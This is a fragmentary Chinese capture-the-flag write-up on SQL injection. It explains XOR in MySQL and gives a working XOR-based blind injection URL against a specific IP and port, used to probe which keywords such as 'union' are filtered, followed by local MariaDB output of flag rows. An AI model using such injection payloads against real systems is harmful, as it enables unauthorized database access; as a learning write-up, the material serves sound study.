 异或是一种逻辑运算，运算法则简言之就是：两个条件相同（同真或同假）即为假（0），两个条件不同即为真（1），null与任何条件做异或运算都为null，如果从数学的角度理解就是，空集与任何集合的交集都为空。
mysql里异或运算符为^ 或者 xor

出现错误，这是因为id后面的内容首先要和^后面的内容进行异或，报错的语句是因为抑或以后id变为0数据库查找不到相关的信息，产生错误，也就是括号里得到内容如果为真则会产生错误，为假则会正常运行，我们可以利用这个进行判断哪些字符被过滤掉了，输入

http://120.24.86.145:9004/1ndex.php?id=1%27^(length(%27union%27)%3E0)%23

union select

MariaDB [sqlinject]> select * from sqltest order by id desc limit 0,2;
+----+----------------------+-----------------+
| id | val                  | submission_date |
+----+----------------------+-----------------+
|  2 | flag{this_is_2_flag} | 2018-09-13      |
|  1 | flag{this_is_flag}   | 2018-09-13      |
+----+----------------------+-----------------+
2 rows in set (0.00 sec)

MariaDB [sqlinject]> select * from sqltest order by id desc limit 1,2;
+----+--------------------+-----------------+
| id | val                | submission_date |
+----+--------------------+-----------------+
|  1 | flag{this_is_flag} | 2018-09-13      |


库名 web1002-1 